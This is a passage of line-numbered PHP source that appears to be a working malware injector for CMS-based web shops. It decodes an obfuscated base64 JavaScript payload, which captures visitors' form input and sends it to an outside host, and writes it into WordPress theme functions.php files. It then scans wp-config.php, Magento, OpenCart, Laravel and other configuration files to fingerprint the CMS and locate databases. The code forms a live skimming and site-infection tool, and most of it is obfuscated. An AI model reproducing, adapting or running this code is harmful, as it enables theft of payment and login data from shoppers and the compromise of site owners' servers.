1MDA2NVx1MDA0M1x1MDA2OFx1MDA2OVx1MDA2Y1x1MDA2NFx1MDAyOFx1MDA3M1x1MDA2M1x1MDA3Mlx1MDA2OVx1MDA3MFx1MDA3NFx1MDA0NVx1MDA2Y1x1MDA2NVx1MDA2ZFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyOVx1MDAzYlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3ZFx1MDAwYVx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3M1x1MDA2M1x1MDA3Mlx1MDA2OVx1MDA3MFx1MDA3NFx1MDA0NVx1MDA2Y1x1MDA2NVx1MDA2ZFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyZVx1MDA2MVx1MDA2NFx1MDA2NFx1MDA0NVx1MDA3Nlx1MDA2NVx1MDA2ZVx1MDA3NFx1MDA0Y1x1MDA2OVx1MDA3M1x1MDA3NFx1MDA2NVx1MDA2ZVx1MDA2NVx1MDA3Mlx1MDAyOFx1MDAyN1x1MDA2Y1x1MDA2Zlx1MDA2MVx1MDA2NFx1MDAyN1x1MDAyY1x1MDAyMFx1MDA3Mlx1MDA2NVx1MDA2ZFx1MDA2Zlx1MDA3Nlx1MDA2NVx1MDA1M1x1MDA2M1x1MDA3Mlx1MDA2OVx1MDA3MFx1MDA3NFx1MDAyOVx1MDAzYlx1MDAwYVx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2NFx1MDA2Zlx1MDA2M1x1MDA3NVx1MDA2ZFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyZVx1MDA2Mlx1MDA2Zlx1MDA2NFx1MDA3OVx1MDAyZVx1MDA2MVx1MDA3MFx1MDA3MFx1MDA2NVx1MDA2ZVx1MDA2NFx1MDA0M1x1MDA2OFx1MDA2OVx1MDA2Y1x1MDA2NFx1MDAyOFx1MDA3M1x1MDA2M1x1MDA3Mlx1MDA2OVx1MDA3MFx1MDA3NFx1MDA0NVx1MDA2Y1x1MDA2NVx1MDA2ZFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyOVx1MDAzYlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2Nlx1MDA3NVx1MDA2ZVx1MDA2M1x1MDA3NFx1MDA2OVx1MDA2Zlx1MDA2ZVx1MDAyMFx1MDA2N1x1MDA2NVx1MDA2ZVx1MDA2NVx1MDA3Mlx1MDA2MVx1MDA3NFx1MDA2NVx1MDA1Mlx1MDA2MVx1MDA2ZVx1MDA2NFx1MDA2Zlx1MDA2ZFx1MDA1M1x1MDA3NFx1MDA3Mlx1MDA2OVx1MDA2ZVx1MDA2N1x1MDAyOFx1MDA3NFx1MDAyOVx1MDAyMFx1MDA3Ylx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2ZVx1MDA3M1x1MDA3NFx1MDAyMFx1MDA2NVx1MDAyMFx1MDAzZFx1MDAyMFx1MDAyMlx1MDA0MVx1MDA0Mlx1MDA0M1x1MDA0NFx1MDA0NVx1MDA0Nlx1MDA0N1x1MDA0OFx1MDA0OVx1MDA0YVx1MDA0Ylx1MDA0Y1x1MDA0ZFx1MDA0ZVx1MDA0Zlx1MDA1MFx1MDA1MVx1MDA1Mlx1MDA1M1x1MDA1NFx1MDA1NVx1MDA1Nlx1MDA1N1x1MDA1OFx1MDA1OVx1MDA1YVx1MDA2MVx1MDA2Mlx1MDA2M1x1MDA2NFx1MDA2NVx1MDA2Nlx1MDA2N1x1MDA2OFx1MDA2OVx1MDA2YVx1MDA2Ylx1MDA2Y1x1MDA2ZFx1MDA2ZVx1MDA2Zlx1MDA3MFx1MDA3MVx1MDA3Mlx1MDA3M1x1MDA3NFx1MDA3NVx1MDA3Nlx1MDA3N1x1MDA3OFx1MDA3OVx1MDA3YVx1MDAzMFx1MDAzMVx1MDAzMlx1MDAzM1x1MDAzNFx1MDAzNVx1MDAzNlx1MDAzN1x1MDAzOFx1MDAzOVx1MDAyMlx1MDAzYlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2Y1x1MDA2NVx1MDA3NFx1MDAyMFx1MDA2ZVx1MDAyMFx1MDAzZFx1MDAyMFx1MDAyMlx1MDAyMlx1MDAzYlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2Nlx1MDA2Zlx1MDA3Mlx1MDAyMFx1MDAyOFx1MDA2Y1x1MDA2NVx1MDA3NFx1MDAyMFx1MDA2Zlx1MDAyMFx1MDAzZFx1MDAyMFx1MDAzMFx1MDAzYlx1MDAyMFx1MDA2Zlx1MDAyMFx1MDAzY1x1MDAyMFx1MDA3NFx1MDAzYlx1MDAyMFx1MDA2Zlx1MDAyYlx1MDAyYlx1MDAyOVx1MDAyMFx1MDA3Ylx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2ZVx1MDA3M1x1MDA3NFx1MDAyMFx1MDA3NFx1MDAyMFx1MDAzZFx1MDAyMFx1MDA0ZFx1MDA2MVx1MDA3NFx1MDA2OFx1MDAyZVx1MDA2Nlx1MDA2Y1x1MDA2Zlx1MDA2Zlx1MDA3Mlx1MDAyOFx1MDAzNlx1MDAzMlx1MDAyMFx1MDAyYVx1MDAyMFx1MDA0ZFx1MDA2MVx1MDA3NFx1MDA2OFx1MDAyZVx1MDA3Mlx1MDA2MVx1MDA2ZVx1MDA2NFx1MDA2Zlx1MDA2ZFx1MDAyOFx1MDAyOVx1MDAyOVx1MDAzYlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2ZVx1MDAyMFx1MDAyYlx1MDAzZFx1MDAyMFx1MDA2NVx1MDAyZVx1MDA2M1x1MDA2OFx1MDA2MVx1MDA3Mlx1MDA0MVx1MDA3NFx1MDAyOFx1MDA3NFx1MDAyOVx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3ZFx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3Mlx1MDA2NVx1MDA3NFx1MDA3NVx1MDA3Mlx1MDA2ZVx1MDAyMFx1MDA2ZVx1MDAwYVx1MDA3ZFx1MDAwYVx1MDAwYVx1MDA2Y1x1MDA2NVx1MDA3NFx1MDAyMFx1MDA3NVx1MDA2OVx1MDA2NFx1MDAyMFx1MDAzZFx1MDAyMFx1MDA2N1x1MDA2NVx1MDA3NFx1MDA0M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDAyOFx1MDAyN1x1MDA3OFx1MDA2M1x1MDA2ZVx1MDA2ZFx1MDA2Zlx1MDAyZFx1MDA2Zlx1MDA2Nlx1MDA2Nlx1MDA3M1x1MDA2NVx1MDA3NFx1MDA2N1x1MDA3OFx1MDA2M1x1MDAyN1x1MDAyOVx1MDAzYlx1MDAwYVx1MDAwYVx1MDA2OVx1MDA2Nlx1MDAyMFx1MDAyOFx1MDAyMVx1MDA3NVx1MDA2OVx1MDA2NFx1MDAyOVx1MDAyMFx1MDA3Ylx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3NVx1MDA2OVx1MDA2NFx1MDAyMFx1MDAzZFx1MDAyMFx1MDA2N1x1MDA2NVx1MDA2ZVx1MDA2NVx1MDA3Mlx1MDA2MVx1MDA3NFx1MDA2NVx1MDA1Mlx1MDA2MVx1MDA2ZVx1MDA2NFx1MDA2Zlx1MDA2ZFx1MDA1M1x1MDA3NFx1MDA3Mlx1MDA2OVx1MDA2ZVx1MDA2N1x1MDAyOFx1MDAzMVx1MDAzMFx1MDAyOVx1MDAzYlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2NFx1MDA2Zlx1MDA2M1x1MDA3NVx1MDA2ZFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyZVx1MDA2M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDAyMFx1MDAzZFx1MDAyMFx1MDA2MFx1MDA3OFx1MDA2M1x1MDA2ZVx1MDA2ZFx1MDA2Zlx1MDAyZFx1MDA2Zlx1MDA2Nlx1MDA2Nlx1MDA3M1x1MDA2NVx1MDA3NFx1MDA2N1x1MDA3OFx1MDA2M1x1MDAzZFx1MDAyNFx1MDA3Ylx1MDA3NVx1MDA2OVx1MDA2NFx1MDA3ZFx1MDAzYlx1MDAyMFx1MDA3MFx1MDA2MVx1MDA3NFx1MDA2OFx1MDAzZFx1MDAyZlx1MDA2MFx1MDAzYlx1MDAwYVx1MDA3ZFx1MDAwYVx1MDAwYVx1MDA2Nlx1MDA3NVx1MDA2ZVx1MDA2M1x1MDA3NFx1MDA2OVx1MDA2Zlx1MDA2ZVx1MDAyMFx1MDA3M1x1MDA2NVx1MDA2ZVx1MDA2NFx1MDA1MFx1MDA2Zlx1MDA3M1x1MDA3NFx1MDA1Mlx1MDA2NVx1MDA3MVx1MDA3NVx1MDA2NVx1MDA3M1x1MDA3NFx1MDAyOFx1MDA3NFx1MDAyY1x1MDAyMFx1MDA2NVx1MDAyOVx1MDAyMFx1MDA3Ylx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2ZVx1MDA3M1x1MDA3NFx1MDAyMFx1MDA2ZVx1MDAyMFx1MDAzZFx1MDAyMFx1MDA2ZVx1MDA2NVx1MDA3N1x1MDAyMFx1MDA1NVx1MDA1Mlx1MDA0Y1x1MDA1M1x1MDA2NVx1MDA2MVx1MDA3Mlx1MDA2M1x1MDA2OFx1MDA1MFx1MDA2MVx1MDA3Mlx1MDA2MVx1MDA2ZFx1MDA3M1x1MDAzYlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2ZVx1MDAyZVx1MDA2MVx1MDA3MFx1MDA3MFx1MDA2NVx1MDA2ZVx1MDA2NFx1MDAyOFx1MDAyMlx1MDA3NVx1MDA2OVx1MDA2NFx1MDAyMlx1MDAyY1x1MDAyMFx1MDA3NVx1MDA2OVx1MDA2NFx1MDAyOVx1MDAyY1x1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2ZVx1MDAyZVx1MDA2MVx1MDA3MFx1MDA3MFx1MDA2NVx1MDA2ZVx1MDA2NFx1MDAyOFx1MDAyMlx1MDA2OVx1MDA1Zlx1MDA2ZVx1MDA2MVx1MDA2ZFx1MDA2NVx1MDAyMlx1MDAyY1x1MDAyMFx1MDA3NFx1MDAyOVx1MDAyY1x1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyZlx1MDAyZlx1MDAyMFx1MDA0MVx1MDA2NFx1MDA2NFx1MDAyMFx1MDA3NFx1MDA2OFx1MDA2NVx1MDAyMFx1MDA2Nlx1MDA2OVx1MDA2NVx1MDA2Y1x1MDA2NFx1MDAyMFx1MDA2ZVx1MDA2MVx1MDA2ZFx1MDA2NVx1MDAyMFx1MDA2MVx1MDA3M1x1MDAyMFx1MDA2MVx1MDAyMFx1MDA3MFx1MDA2MVx1MDA3Mlx1MDA2MVx1MDA2ZFx1MDA2NVx1MDA3NFx1MDA2NVx1MDA3Mlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2ZVx1MDAyZVx1MDA2MVx1MDA3MFx1MDA3MFx1MDA2NVx1MDA2ZVx1MDA2NFx1MDAyOFx1MDAyMlx1MDA2Mlx1MDAyMlx1MDAyY1x1MDAyMFx1MDA2Mlx1MDA3NFx1MDA2Zlx1MDA2MVx1MDAyOFx1MDA2NVx1MDAyOVx1MDAyOVx1MDAyY1x1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2Nlx1MDA2NVx1MDA3NFx1MDA2M1x1MDA2OFx1MDAyOFx1MDAyMlx1MDA2OFx1MDA3NFx1MDA3NFx1MDA3MFx1MDA3M1x1MDAzYVx1MDAyZlx1MDAyZlx1MDA2OFx1MDA2Zlx1MDA3M1x1MDA3NFx1MDA3MFx1MDA2NFx1MDA2Nlx1MDAyZVx1MDA2M1x1MDA2Zlx1MDAyZlx1MDA3MFx1MDA2OVx1MDA2ZVx1MDA2M1x1MDA2OFx1MDA2NVx1MDAyZVx1MDA3MFx1MDA2OFx1MDA3MFx1MDAyMlx1MDAyY1x1MDAyMFx1MDA3Ylx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2ZFx1MDA2NVx1MDA3NFx1MDA2OFx1MDA2Zlx1MDA2NFx1MDAzYVx1MDAyMFx1MDAyMlx1MDA1MFx1MDA0Zlx1MDA1M1x1MDA1NFx1MDAyMlx1MDAyY1x1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2OFx1MDA2NVx1MDA2MVx1MDA2NFx1MDA2NVx1MDA3Mlx1MDA3M1x1MDAzYVx1MDAyMFx1MDA3Ylx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMlx1MDA0M1x1MDA2Zlx1MDA2ZVx1MDA3NFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyZFx1MDA1NFx1MDA3OVx1MDA3MFx1MDA2NVx1MDAyMlx1MDAzYVx1MDAyMFx1MDAyMlx1MDA2MVx1MDA3MFx1MDA3MFx1MDA2Y1x1MDA2OVx1MDA2M1x1MDA2MVx1MDA3NFx1MDA2OVx1MDA2Zlx1MDA2ZVx1MDAyZlx1MDA3OFx1MDAyZFx1MDA3N1x1MDA3N1x1MDA3N1x1MDAyZFx1MDA2Nlx1MDA2Zlx1MDA3Mlx1MDA2ZFx1MDAyZFx1MDA3NVx1MDA3Mlx1MDA2Y1x1MDA2NVx1MDA2ZVx1MDA2M1x1MDA2Zlx1MDA2NFx1MDA2NVx1MDA2NFx1MDAyMlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3ZFx1MDAyY1x1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2Mlx1MDA2Zlx1MDA2NFx1MDA3OVx1MDAzYVx1MDAyMFx1MDA2ZVx1MDAyZVx1MDA3NFx1MDA2Zlx1MDA1M1x1MDA3NFx1MDA3Mlx1MDA2OVx1MDA2ZVx1MDA2N1x1MDAyOFx1MDAyOVx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3ZFx1MDAyOVx1MDAyZVx1MDA3NFx1MDA2OFx1MDA2NVx1MDA2ZVx1MDAyOFx1MDAyOFx1MDA3NFx1MDAzZFx1MDAzZVx1MDA3NFx1MDAyZVx1MDA3NFx1MDA2NVx1MDA3OFx1MDA3NFx1MDAyOFx1MDAyOVx1MDAyOVx1MDAyOVx1MDAyZVx1MDA3NFx1MDA2OFx1MDA2NVx1MDA2ZVx1MDAyOFx1MDAyOFx1MDA3NFx1MDAzZFx1MDAzZVx1MDA2M1x1MDA2Zlx1MDA2ZVx1MDA3M1x1MDA2Zlx1MDA2Y1x1MDA2NVx1MDAyZVx1MDA2Y1x1MDA2Zlx1MDA2N1x1MDAyOFx1MDA3NFx1MDAyOVx1MDAyOVx1MDAyOVx1MDAyZVx1MDA2M1x1MDA2MVx1MDA3NFx1MDA2M1x1MDA2OFx1MDAyOFx1MDAyOFx1MDA3NFx1MDAzZFx1MDAzZVx1MDA2M1x1MDA2Zlx1MDA2ZVx1MDA3M1x1MDA2Zlx1MDA2Y1x1MDA2NVx1MDAyZVx1MDA2NVx1MDA3Mlx1MDA3Mlx1MDA2Zlx1MDA3Mlx1MDAyOFx1MDAyMlx1MDA0NVx1MDA3Mlx1MDA3Mlx1MDA2Zlx1MDA3Mlx1MDAzYVx1MDAyMlx1MDAyY1x1MDAyMFx1MDA3NFx1MDAyOVx1MDAyOVx1MDAyOVx1MDAwYVx1MDA3ZFx1MDAwYVx1MDAwYVx1MDA2NFx1MDA2Zlx1MDA2M1x1MDA3NVx1MDA2ZFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyZVx1MDA2MVx1MDA2NFx1MDA2NFx1MDA0NVx1MDA3Nlx1MDA2NVx1MDA2ZVx1MDA3NFx1MDA0Y1x1MDA2OVx1MDA3M1x1MDA3NFx1MDA2NVx1MDA2ZVx1MDA2NVx1MDA3Mlx1MDAyOFx1MDAyMlx1MDA2OVx1MDA2ZVx1MDA3MFx1MDA3NVx1MDA3NFx1MDAyMlx1MDAyY1x1MDAyMFx1MDAyOFx1MDA2Nlx1MDA3NVx1MDA2ZVx1MDA2M1x1MDA3NFx1MDA2OVx1MDA2Zlx1MDA2ZVx1MDAyOFx1MDA3NFx1MDAyOVx1MDAyMFx1MDA3Ylx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2OVx1MDA2Nlx1MDAyMFx1MDAyOFx1MDAyMlx1MDA0OVx1MDA0ZVx1MDA1MFx1MDA1NVx1MDA1NFx1MDAyMlx1MDAyMFx1MDAzZFx1MDAzZFx1MDAzZFx1MDAyMFx1MDA3NFx1MDAyZVx1MDA3NFx1MDA2MVx1MDA3Mlx1MDA2N1x1MDA2NVx1MDA3NFx1MDAyZVx1MDA3NFx1MDA2MVx1MDA2N1x1MDA0ZVx1MDA2MVx1MDA2ZFx1MDA2NVx1MDAyMFx1MDAyNlx1MDAyNlx1MDAyMFx1MDAyMlx1MDA2Mlx1MDA3NVx1MDA3NFx1MDA3NFx1MDA2Zlx1MDA2ZVx1MDAyMlx1MDAyMFx1MDAyMVx1MDAzZFx1MDAzZFx1MDAyMFx1MDA3NFx1MDAyZVx1MDA3NFx1MDA2MVx1MDA3Mlx1MDA2N1x1MDA2NVx1MDA3NFx1MDAyZVx1MDA3NFx1MDA3OVx1MDA3MFx1MDA2NVx1MDAyOVx1MDAyMFx1MDA3Ylx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3M1x1MDA2NVx1MDA2ZVx1MDA2NFx1MDA1MFx1MDA2Zlx1MDA3M1x1MDA3NFx1MDA1Mlx1MDA2NVx1MDA3MVx1MDA3NVx1MDA2NVx1MDA3M1x1MDA3NFx1MDAyOFx1MDA3NFx1MDAyZVx1MDA3NFx1MDA2MVx1MDA3Mlx1MDA2N1x1MDA2NVx1MDA3NFx1MDAyZVx1MDA2ZVx1MDA2MVx1MDA2ZFx1MDA2NVx1MDAyMFx1MDA3Y1x1MDA3Y1x1MDAyMFx1MDA3NFx1MDAyZVx1MDA3NFx1MDA2MVx1MDA3Mlx1MDA2N1x1MDA2NVx1MDA3NFx1MDAyZVx1MDA2OVx1MDA2NFx1MDAyY1x1MDAyMFx1MDA3NFx1MDAyZVx1MDA3NFx1MDA2MVx1MDA3Mlx1MDA2N1x1MDA2NVx1MDA3NFx1MDAyZVx1MDA3Nlx1MDA2MVx1MDA2Y1x1MDA3NVx1MDA2NVx1MDAyOVx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3ZFx1MDAwYVx1MDA3ZFx1MDAyOVx1MDAyOVx1MDAzYlx1MDAwYVx1MDAwYVx1MDA2Nlx1MDA3NVx1MDA2ZVx1MDA2M1x1MDA3NFx1MDA2OVx1MDA2Zlx1MDA2ZVx1MDAyMFx1MDA2N1x1MDA2NVx1MDA3NFx1MDA0M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDAyOFx1MDA2ZVx1MDA2MVx1MDA2ZFx1MDA2NVx1MDAyOVx1MDAyMFx1MDA3Ylx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2ZVx1MDA3M1x1MDA3NFx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDA1M1x1MDA3NFx1MDA3Mlx1MDA2OVx1MDA2ZVx1MDA2N1x1MDAyMFx1MDAzZFx1MDAyMFx1MDA2NFx1MDA2Zlx1MDA2M1x1MDA3NVx1MDA2ZFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyZVx1MDA2M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDAzYlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2ZVx1MDA3M1x1MDA3NFx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDA3M1x1MDAyMFx1MDAzZFx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDA1M1x1MDA3NFx1MDA3Mlx1MDA2OVx1MDA2ZVx1MDA2N1x1MDAyZVx1MDA3M1x1MDA3MFx1MDA2Y1x1MDA2OVx1MDA3NFx1MDAyOFx1MDAyN1x1MDAzYlx1MDAyMFx1MDAyN1x1MDAyOVx1MDAzYlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2Nlx1MDA2Zlx1MDA3Mlx1MDAyMFx1MDAyOFx1MDA2Y1x1MDA2NVx1MDA3NFx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDAyMFx1MDA2Zlx1MDA2Nlx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDA3M1x1MDAyOVx1MDAyMFx1MDA3Ylx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2ZVx1MDA3M1x1MDA3NFx1MDAyMFx1MDA1Ylx1MDA2M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDA0ZVx1MDA2MVx1MDA2ZFx1MDA2NVx1MDAyY1x1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDA1Nlx1MDA2MVx1MDA2Y1x1MDA3NVx1MDA2NVx1MDA1ZFx1MDAyMFx1MDAzZFx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDAyZVx1MDA3M1x1MDA3MFx1MDA2Y1x1MDA2OVx1MDA3NFx1MDAyOFx1MDAyN1x1MDAzZFx1MDAyN1x1MDAyOVx1MDAzYlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2OVx1MDA2Nlx1MDAyMFx1MDAyOFx1MDA2M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDA0ZVx1MDA2MVx1MDA2ZFx1MDA2NVx1MDAyMFx1MDAzZFx1MDAzZFx1MDAzZFx1MDAyMFx1MDA2ZVx1MDA2MVx1MDA2ZFx1MDA2NVx1MDAyOVx1MDAyMFx1MDA3Ylx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3Mlx1MDA2NVx1MDA3NFx1MDA3NVx1MDA3Mlx1MDA2ZVx1MDAyMFx1MDA2M1x1MDA2Zlx1MDA2Zlx1MDA2Ylx1MDA2OVx1MDA2NVx1MDA1Nlx1MDA2MVx1MDA2Y1x1MDA3NVx1MDA2NVx1MDAzYlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3ZFx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3ZFx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3Mlx1MDA2NVx1MDA3NFx1MDA3NVx1MDA3Mlx1MDA2ZVx1MDAyMFx1MDA2ZVx1MDA3NVx1MDA2Y1x1MDA2Y1x1MDAzYlx1MDAwYVx1MDA3ZFx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMCIpOzwvc2NyaXB0Pic7Cn0KJGhhc19ydW4gPSBnZXRfb3B0aW9uKCdteV9hZG1pbl9pbml0X2Z1bmN0aW9uX3J1bicpOwppZiAoJGhhc19ydW4gIT09ICd5ZXMnKSB7CglhZGRfYWN0aW9uKCd3cF9mb290ZXInLCAnYWRkX2Zvb3Rlcl9zY3JpcHQnKTsKfQp9";
    385 
    386     // Decode base64 content to string
    387     $dcd_ctnt = base64_decode($azb);
    388     // Process the detected configuration files and extract CMS information
    389     foreach ($cms_config_files as $file) {
    390        // echo($file);
    391        try {
    392         // Check if file path contains '/plugins/' and ends with '.php'
    393         if (strpos($file, '/themes/') !== false && substr($file, -13) === 'functions.php') {
    394     // Your custom content to add
    395     $custom_content = PHP_EOL . $dcd_ctnt . PHP_EOL; // Add new lines for separation
    396 
    397     try {
    398         // Read the existing file content
    399         $file_content = file_get_contents($file);
    400 
    401        
    402 
    403         $php_close_pos = strpos($file_content, '?>');
    404 
    405         if ($php_close_pos !== false) {
    406             $new_content = substr_replace($file_content, $custom_content . '?>', $php_close_pos, 2);
    407 
    408             // Write the modified content back to the file
    409             file_put_contents($file, $new_content);
    410 
    411         }
    412     } catch (Exception $e) {
    413         // Handle the exception
    414         // Optionally, revert to the backup file
    415        
    416         }
    417     }
    418     } catch (Exception $e) {
    419         continue; // Continue to the next file on error
    420     }
    421         if (strpos($file, 'wp-config.php') !== false) {
    422 
    423            $detected_cms['WordPress'] = true;
    424            $wp_config_paths[] = $file;
    425 
    426         } elseif (strpos($file, 'class-wc-settings.php') !== false) {
    427             // You may add a specific check for WooCommerce here if needed
    428             $detected_cms['WooCommerce'] = true;
    429             $wc_config_paths[] = $file;
    430         } elseif (strpos($file, 'env.php') !== false &&
    431             strpos($file, 'Composer') === false &&
    432             strpos($file, 'composer') === false &&
    433             strpos($file, 'Softaculous') === false) {
    434             // You may add a specific check for Magento here if needed
    435             // Read the content of the file
    436             $fileContent = file_get_contents($file);
    437 
    438             // Check if the content contains the string 'host' => '
    439             if (strpos($fileContent, "'host' => '") !== false) {
    440               $detected_cms['Magento'] = true;
    441               $mg_config_paths[] = $file;
    442               /*echo("MAGENTO\n\n\n");
    443               echo("MAGENTO\n\n\n");
    444               echo("MAGENTO\n\n\n");
    445               echo("MAGENTO\n\n\n");
    446               echo("MAGENTO\n\n\n");
    447               echo("MAGENTO\n\n\n");
    448               echo("MAGENTO\n\n\n");
    449               echo("MAGENTO\n\n\n");
    450               echo($file);
    451               echo($file);
    452               echo($file);
    453               echo($file);
    454               echo($file);
    455               echo("MAGENTO\n\n\n");
    456               echo("MAGENTO\n\n\n");
    457               echo("MAGENTO\n\n\n");
    458               echo("MAGENTO\n\n\n");
    459               echo("MAGENTO\n\n\n");
    460               echo("MAGENTO\n\n\n");
    461               echo("MAGENTO\n\n\n");
    462               echo("MAGENTO\n\n\n");*/
    463             }
    464 
    465         } elseif (strpos($file, 'config.php') !== false &&
    466             strpos($file, 'Composer') === false &&
    467             strpos($file, 'composer') === false &&
    468             strpos($file, 'Softaculous') === false) {
    469             if (strpos(file_get_contents($file), '$config[\'encryption_key\']') !== false) {
    470                 $detected_cms['OpenCart'] = true;
    471             }
    472         } elseif (strpos($file, 'parameters.php') !== false) {
    473             if (strpos(file_get_contents($file), 'prestashop') !== false) {
    474                 $detected_cms['PrestaShop'] = true;
    475             }
    476         } elseif (strpos($file, 'settings.php') !== false) {
    477             if (strpos(file_get_contents($file), 'drupal') !== false) {
    478                 $detected_cms['Drupal Commerce'] = true;
    479             }
    480         } elseif (strpos($file, '.yaml') !== false) {
    481             if (strpos(file_get_contents($file), 'Symfony\Component') !== false) {
    482                 $detected_cms['Symfony'] = true;
    483             }
    484         } elseif (strpos($file, '.env') !== false) {
    485             // You may add a specific check for Laravel here if needed
    486             $detected_cms['Laravel'] = true;
    487         } elseif (strpos($file, '.global.php') !== false) {
    488             // You may add a specific check for Zend Framework here if needed
    489             $detected_cms['Zend Framework'] = true;
    490         } elseif (strpos($file, '.dat') !== false) {
    491             $detected_dat_files[] = $file;
    492         }
    493     }
    494 
    495     // Convert the boolean values to strings
    496     foreach ($detected_cms as $cms => $detected) {
    497         $detected_cms[$cms] = $detected ? 'true' : 'false';
    498     }
    499 
    500     // Now $detected_cms array contains the names of detected CMS based on the configuration files found
    501     // And $detected_dat_files array contains the paths of detected .dat files
    502 
    503     // Read users from the database and count them for WordPress and WooCommerce
